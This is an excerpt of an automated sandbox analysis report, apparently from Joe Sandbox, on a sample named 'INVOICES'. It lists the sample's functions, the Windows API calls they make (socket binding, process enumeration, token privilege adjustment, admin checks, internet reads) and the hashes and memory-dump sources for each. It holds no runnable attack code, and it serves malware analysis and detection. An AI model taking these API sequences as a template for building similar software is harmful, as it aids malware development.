                                                                                                                                  • API String ID: 591255283-0
                                                                                                                                  • Opcode ID: c61ea82701bd9bf6ed2e803e072728ddf34910d490dd243644f810ff95fe8e74
                                                                                                                                  • Instruction ID: 83f31c58bd5598958d82c297a14de341795fa459524260b605df6202b8473848
                                                                                                                                  • Opcode Fuzzy Hash: c61ea82701bd9bf6ed2e803e072728ddf34910d490dd243644f810ff95fe8e74
                                                                                                                                  • Instruction Fuzzy Hash: B8A138B1102584FAF638AA788C49EBF375DDB42382F948119F903D5193DA2CAD41D276
                                                                                                                                  Function 007A685D Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 007A7EA0: inet_addr.WS2_32(00000000), ref: 007A7ECB
                                                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 007A68B4
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 007A68DD
                                                                                                                                  • bind.WS2_32(00000000,?,00000010), ref: 007A6916
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 007A6923
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 007A6937
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 99427753-0
                                                                                                                                  • Opcode ID: 258cd0f931dddcf382e06d31913856d20e375e0798d13cbaccc99daa57dd3b41
                                                                                                                                  • Instruction ID: 45f332b4a90a493dfeae6f098c5ddd66735ac94b1d66197a88e332bdf2e5b72f
                                                                                                                                  • Opcode Fuzzy Hash: 258cd0f931dddcf382e06d31913856d20e375e0798d13cbaccc99daa57dd3b41
                                                                                                                                  • Instruction Fuzzy Hash: D541E671640214EFEB10AF64CC8AF6E77A8DF45B10F04815CFA5AAB3C3DA789D008791
                                                                                                                                  Function 007B53DF Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 292994002-0
                                                                                                                                  • Opcode ID: 632e03b1686456ea7cf6a1adbefdf3489ffd9a1be2cdc0370bd229fb96a8c4de
                                                                                                                                  • Instruction ID: 7d84d551b3c44ce55bae064cab8d4434351a3f260585ad6920c258f6c25db727
                                                                                                                                  • Opcode Fuzzy Hash: 632e03b1686456ea7cf6a1adbefdf3489ffd9a1be2cdc0370bd229fb96a8c4de
                                                                                                                                  • Instruction Fuzzy Hash: 8D11E731700950AFE7216F26DC48FAE7799FF44762F048528F946D7251CB7CE842CA95
                                                                                                                                  Function 0079C423 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0079C4BE
                                                                                                                                  • CoCreateInstance.COMBASE(007C2D6C,00000000,00000001,007C2BDC,?), ref: 0079C4D6
                                                                                                                                    • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
                                                                                                                                  • CoUninitialize.COMBASE ref: 0079C743
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                  • String ID: .lnk
                                                                                                                                  • API String ID: 2683427295-24824748
                                                                                                                                  • Opcode ID: 2524597fe9fd58d47e96738b6e3a75794ba7a55ad2f93a3f47af3b1667bfd698
                                                                                                                                  • Instruction ID: 7d5b72cc2ca6df5f63bfbe1ee8147aeefd3f64ed76d03bc59a0f566e6acab824
                                                                                                                                  • Opcode Fuzzy Hash: 2524597fe9fd58d47e96738b6e3a75794ba7a55ad2f93a3f47af3b1667bfd698
                                                                                                                                  • Instruction Fuzzy Hash: 40A12CB1108205AFE704EF54CC95EABB7E8EF94704F008A1CF15697192DBB4EA09CB52
                                                                                                                                  Function 007AEF21 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 007AEF51
                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 007AEF5F
                                                                                                                                    • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
                                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 007AF01F
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 007AF02E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2576544623-0
                                                                                                                                  • Opcode ID: aea9103ca1e729a11effa7a0bcb572419138cd5113e0c3f7a02755ffd32c6b9e
                                                                                                                                  • Instruction ID: 0cce780374b6957b73bf50286d26b6e712bc439f748e682781dfbf46af8d03f1
                                                                                                                                  • Opcode Fuzzy Hash: aea9103ca1e729a11effa7a0bcb572419138cd5113e0c3f7a02755ffd32c6b9e
                                                                                                                                  • Instruction Fuzzy Hash: 8E516DB1504301EFE310EF24DC89E6BBBE8EF85710F10492DF59597252EB74A904CB92
                                                                                                                                  Function 007BC502 Relevance: 6.1, APIs: 4, Instructions: 83nativewindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • GetCursorPos.USER32(?), ref: 007BC53C
                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0076BB2B,?,?,?,?,?), ref: 007BC551
                                                                                                                                  • GetCursorPos.USER32(?), ref: 007BC59E
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0076BB2B,?,?,?), ref: 007BC5D8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1423138444-0
                                                                                                                                  • Opcode ID: faa5b08f1947c2e998227f6c369537635768a2c706018d8fdfe8af89b3b92f4c
                                                                                                                                  • Instruction ID: 8d4608d7d41bee03c8523feb15fde6cce8eea5d5326dc885ab2e1c888227484a
                                                                                                                                  • Opcode Fuzzy Hash: faa5b08f1947c2e998227f6c369537635768a2c706018d8fdfe8af89b3b92f4c
                                                                                                                                  • Instruction Fuzzy Hash: EC317336600418EFCB268F54C858FEB7BB5EF49710F148165F9058B261D739AD61DBB0
                                                                                                                                  Function 00731290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 007312D8
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0076B77B
                                                                                                                                  • GetCursorPos.USER32(?), ref: 0076B785
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0076B790
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1010295502-0
                                                                                                                                  • Opcode ID: 10ea8547d96a7d3fb974803f7d3ffcda61dfa1fcbb0ff799a497874b795a31f3
                                                                                                                                  • Instruction ID: a769ca2d1f07010651b6d7f1bd546c334e525cd82b0c7bdc39882939742c1489
                                                                                                                                  • Opcode Fuzzy Hash: 10ea8547d96a7d3fb974803f7d3ffcda61dfa1fcbb0ff799a497874b795a31f3
                                                                                                                                  • Instruction Fuzzy Hash: 30111935A00019EBDB10EF98D8899AE77B8FB05300F404555FA41E7252C738BA51CBA9
                                                                                                                                  Function 0078E928 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0078E93A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen
                                                                                                                                  • String ID: ($|
                                                                                                                                  • API String ID: 1659193697-1631851259
                                                                                                                                  • Opcode ID: 8f6fecb76b7cc15b9befd8c0e7eacc32362a09438ba13fef5fac812087542b02
                                                                                                                                  • Instruction ID: d847a73351f9fc0eb03667cfce1f9633995b319e5cc0f7f727b7205e4bc3a09a
                                                                                                                                  • Opcode Fuzzy Hash: 8f6fecb76b7cc15b9befd8c0e7eacc32362a09438ba13fef5fac812087542b02
                                                                                                                                  • Instruction Fuzzy Hash: 7B324575A00605DFC728DF29C4819AAB7F0FF48720B15C56EE89ADB3A1E770E981CB40
                                                                                                                                  Function 007A2404 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007A1920,00000000), ref: 007A24F7
                                                                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007A252E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 599397726-0
                                                                                                                                  • Opcode ID: b2b3d8d00a4645a967512dfc0999cc4d2e30812bcc77c5e70353b1b55d547469
                                                                                                                                  • Instruction ID: 7da56062693e3bf215ca2967fd697658a76057956e0216f555f279eb9f2c2c47
                                                                                                                                  • Opcode Fuzzy Hash: b2b3d8d00a4645a967512dfc0999cc4d2e30812bcc77c5e70353b1b55d547469
                                                                                                                                  • Instruction Fuzzy Hash: D4410971904209FFEB20DF98DC85EBBB7BCEB85724F10416AFA01A2142DB789E529650
                                                                                                                                  Function 0079B3BF Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0079B3CF
                                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0079B429
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0079B476
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1682464887-0
                                                                                                                                  • Opcode ID: 17b704ccfa3688aafb9ba68cf55e81a904d0359c8040d56885e5d722de3f6811
                                                                                                                                  • Instruction ID: b129ddaeba6ff1015a838bba413ed1973c80012cbee29fab98d225d0c4780640
                                                                                                                                  • Opcode Fuzzy Hash: 17b704ccfa3688aafb9ba68cf55e81a904d0359c8040d56885e5d722de3f6811
                                                                                                                                  • Instruction Fuzzy Hash: 02214C35A00518EFDB00EFA5EC84EEDBBB8FF48310F1481A9E905AB362CB359915CB54
                                                                                                                                  Function 00788AA3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00750F36: std::exception::exception.LIBCMT ref: 00750F6C
                                                                                                                                    • Part of subcall function 00750F36: __CxxThrowException@8.LIBCMT ref: 00750F81
                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00788AED
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00788B1A
                                                                                                                                  • GetLastError.KERNEL32 ref: 00788B27
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1922334811-0
                                                                                                                                  • Opcode ID: 9e7d63eb7baccb434698c3118a1ff4bb329a8d42473c74113ad95f59ecbc2338
                                                                                                                                  • Instruction ID: b95fe13a9f34cbf486cc909094b78422fe975f13efa5f0d9fc8c8425e2e3ca05
                                                                                                                                  • Opcode Fuzzy Hash: 9e7d63eb7baccb434698c3118a1ff4bb329a8d42473c74113ad95f59ecbc2338
                                                                                                                                  • Instruction Fuzzy Hash: 1311BCB1514208AFD728AF64DC89D6BBBB8EB44711B20C26EF45693251EB74AC00CB60
                                                                                                                                  Function 00794A08 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00794A31
                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00794A48
                                                                                                                                  • FreeSid.ADVAPI32(?), ref: 00794A58
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3429775523-0
                                                                                                                                  • Opcode ID: 5ff3722d45f094f2b74436ab960ff82df198831647c8c78a931af2829d5ff410
                                                                                                                                  • Instruction ID: e4214a74fdbe06b9610a35c7137e51b2c48fb74f29fb17e3b98a9a53b57c4b56
                                                                                                                                  • Opcode Fuzzy Hash: 5ff3722d45f094f2b74436ab960ff82df198831647c8c78a931af2829d5ff410
                                                                                                                                  • Instruction Fuzzy Hash: 0EF04975A5130CBFDF00DFF0DC89EAEBBBCEF08601F0085A9E901E2191E6746A048B54
                                                                                                                                  Function 0073E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a2e24dae9cebc89338ae452a81df02f3d62b7175b7442b77193996696da6f14f
                                                                                                                                  • Instruction ID: d8a2de121ca0bc83f3ccf975c0e51d824d29eeea035f3eb46d9aee60c2f49c81
                                                                                                                                  • Opcode Fuzzy Hash: a2e24dae9cebc89338ae452a81df02f3d62b7175b7442b77193996696da6f14f
                                                                                                                                  • Instruction Fuzzy Hash: D822907190021ADFEB24DF54C485BAEB7B0FF08310F148169E956AB392E778AD85CB91
                                                                                                                                  Function 007316DE Relevance: 3.1, APIs: 2, Instructions: 83nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                    • Part of subcall function 007325DB: GetWindowLongW.USER32(?,000000EB), ref: 007325EC
                                                                                                                                  • GetParent.USER32(?), ref: 0076B93A
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,007319B3,?,?,?,00000006,?), ref: 0076B9B4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
